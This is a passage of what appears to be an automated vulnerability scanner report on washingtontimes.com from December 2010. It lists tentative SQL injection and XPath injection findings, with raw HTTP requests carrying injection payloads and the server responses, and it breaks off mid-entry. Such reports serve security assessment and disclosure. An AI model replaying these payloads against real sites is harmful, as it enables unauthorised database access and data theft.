Content-Length: 14520
Date: Mon, 13 Dec 2010 21:39:04 GMT
X-Varnish: 570592255
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11241481'%20or%201%3d1--%20 and 11241481'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection11241481'%20or%201%3d1--%20/obamas-celebrate-christmas-washington/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14494
Date: Mon, 13 Dec 2010 21:37:11 GMT
X-Varnish: 570589541
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /multimedia/collection11241481'%20or%201%3d2--%20/obamas-celebrate-christmas-washington/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14699
Date: Mon, 13 Dec 2010 21:37:11 GMT
X-Varnish: 570589556
Age: 0
Via: 1.1 varnish
Connection: close
1.12. http://www.washingtontimes.com/multimedia/collection/pope-inaugurates-christmas-season/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19267156%20or%201%3d1--%20 and 19267156%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection/pope-inaugurates-christmas-season/?119267156%20or%201%3d1--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21075
Date: Mon, 13 Dec 2010 21:35:31 GMT
X-Varnish: 570586722
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /multimedia/collection/pope-inaugurates-christmas-season/?119267156%20or%201%3d2--%20=1 HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20884
Date: Mon, 13 Dec 2010 21:35:33 GMT
X-Varnish: 570586931
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13714572'%20or%201%3d1--%20 and 13714572'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /multimedia/collection13714572'%20or%201%3d1--%20/students-protest-british-tuition-hike-plan/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14699
Date: Mon, 13 Dec 2010 21:38:02 GMT
X-Varnish: 570590898
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /multimedia/collection13714572'%20or%201%3d2--%20/students-protest-british-tuition-hike-plan/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14669
Date: Mon, 13 Dec 2010 21:38:10 GMT
X-Varnish: 570590906
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 46142550'%20or%201%3d1--%20 and 46142550'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/2010/dec46142550'%20or%201%3d1--%20/12/us-free-traders-sour-on-china/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14639
Date: Mon, 13 Dec 2010 21:30:48 GMT
X-Varnish: 570580560
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /news/2010/dec46142550'%20or%201%3d2--%20/12/us-free-traders-sour-on-china/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14669
Date: Mon, 13 Dec 2010 21:31:00 GMT
X-Varnish: 570580570
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 39115151'%20or%201%3d1--%20 and 39115151'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news39115151'%20or%201%3d1--%20/inside-the-ring/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:27:42 GMT
X-Varnish: 570576327
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /news39115151'%20or%201%3d2--%20/inside-the-ring/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14717
Date: Mon, 13 Dec 2010 21:27:55 GMT
X-Varnish: 570576641
Age: 0
Via: 1.1 varnish
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17535976'%20or%201%3d1--%20 and 17535976'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news17535976'%20or%201%3d1--%20/pruden-on-politics/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:28:24 GMT
X-Varnish: 570577291
Age: 0
Via: 1.1 varnish
Connection: close
Request 2
GET /news17535976'%20or%201%3d2--%20/pruden-on-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14717 Date: Mon, 13 Dec 2010 21:28:25 GMT X-Varnish: 570577536 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10016926'%20or%201%3d1--%20 and 10016926'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/commentary10016926'%20or%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14479 Date: Mon, 13 Dec 2010 21:29:23 GMT X-Varnish: 570578473 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /opinion/commentary10016926'%20or%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14654 Date: Mon, 13 Dec 2010 21:29:24 GMT X-Varnish: 570578713 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion'%20and%201%3d1--%20/decker/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14721 Date: Mon, 13 Dec 2010 21:29:28 GMT X-Varnish: 570578594 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /opinion'%20and%201%3d2--%20/decker/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14580 Date: Mon, 13 Dec 2010 21:29:29 GMT X-Varnish: 570578837 Age: 0 Via: 1.1 varnish Connection: close
1.19. http://www.washingtontimes.com/opinion/decker/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.washingtontimes.com
Path: /opinion/decker/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/decker/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 30547 Date: Mon, 13 Dec 2010 21:27:55 GMT X-Varnish: 570576816 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /opinion/decker/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 30342 Date: Mon, 13 Dec 2010 21:28:09 GMT X-Varnish: 570576933 Age: 0 Via: 1.1 varnish Connection: close
1.20. http://www.washingtontimes.com/opinion/editorials/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.washingtontimes.com
Path: /opinion/editorials/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 21423528'%20or%201%3d1--%20 and 21423528'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/editorials/?121423528'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 39985 Date: Mon, 13 Dec 2010 21:26:48 GMT X-Varnish: 570575306 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /opinion/editorials/?121423528'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 39968 Date: Mon, 13 Dec 2010 21:26:58 GMT X-Varnish: 570575553 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion'%20and%201%3d1--%20/letters/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14714 Date: Mon, 13 Dec 2010 21:29:14 GMT X-Varnish: 570578281 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /opinion'%20and%201%3d2--%20/letters/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14738 Date: Mon, 13 Dec 2010 21:29:25 GMT X-Varnish: 570578510 Age: 0 Via: 1.1 varnish Connection: close
1.22. http://www.washingtontimes.com/sports/baseball/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.washingtontimes.com
Path: /sports/baseball/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16877614%20or%201%3d1--%20 and 16877614%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports/baseball/?116877614%20or%201%3d1--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 41133 Date: Mon, 13 Dec 2010 21:30:20 GMT X-Varnish: 570579927 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /sports/baseball/?116877614%20or%201%3d2--%20=1 HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 41116 Date: Mon, 13 Dec 2010 21:30:21 GMT X-Varnish: 570579953 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports'%20and%201%3d1--%20/golf/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14534 Date: Mon, 13 Dec 2010 21:33:30 GMT X-Varnish: 570584003 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /sports'%20and%201%3d2--%20/golf/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14716 Date: Mon, 13 Dec 2010 21:33:31 GMT X-Varnish: 570584014 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports'%20and%201%3d1--%20/hockey/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14716 Date: Mon, 13 Dec 2010 21:32:27 GMT X-Varnish: 570582610 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /sports'%20and%201%3d2--%20/hockey/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:32:28 GMT X-Varnish: 570582616 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 79157052'%20or%201%3d1--%20 and 79157052'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sports/soccer79157052'%20or%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14192 Date: Mon, 13 Dec 2010 21:34:01 GMT X-Varnish: 570584819 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /sports/soccer79157052'%20or%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14326 Date: Mon, 13 Dec 2010 21:34:13 GMT X-Varnish: 570584830 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21465276'%20or%201%3d1--%20 and 21465276'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /staff21465276'%20or%201%3d1--%20/rowan-scarborough/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14722 Date: Mon, 13 Dec 2010 21:28:33 GMT X-Varnish: 570577724 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /staff21465276'%20or%201%3d2--%20/rowan-scarborough/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14739 Date: Mon, 13 Dec 2010 21:28:33 GMT X-Varnish: 570577730 Age: 0 Via: 1.1 varnish Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11145785'%20or%201%3d1--%20 and 11145785'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /video/white-house-minute11145785'%20or%201%3d1--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14486 Date: Mon, 13 Dec 2010 21:38:41 GMT X-Varnish: 570591887 Age: 0 Via: 1.1 varnish Connection: close
Request 2
GET /video/white-house-minute11145785'%20or%201%3d2--%20/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14459 Date: Mon, 13 Dec 2010 21:38:41 GMT X-Varnish: 570591896 Age: 0 Via: 1.1 varnish Connection: close
2. XPath injection
There are 6 instances of this issue:
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static%00'/js/global.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:28 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js%00'/global.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:29 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js/global.js%00' HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:30 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static%00'/js/jquery.cookies.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:28 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
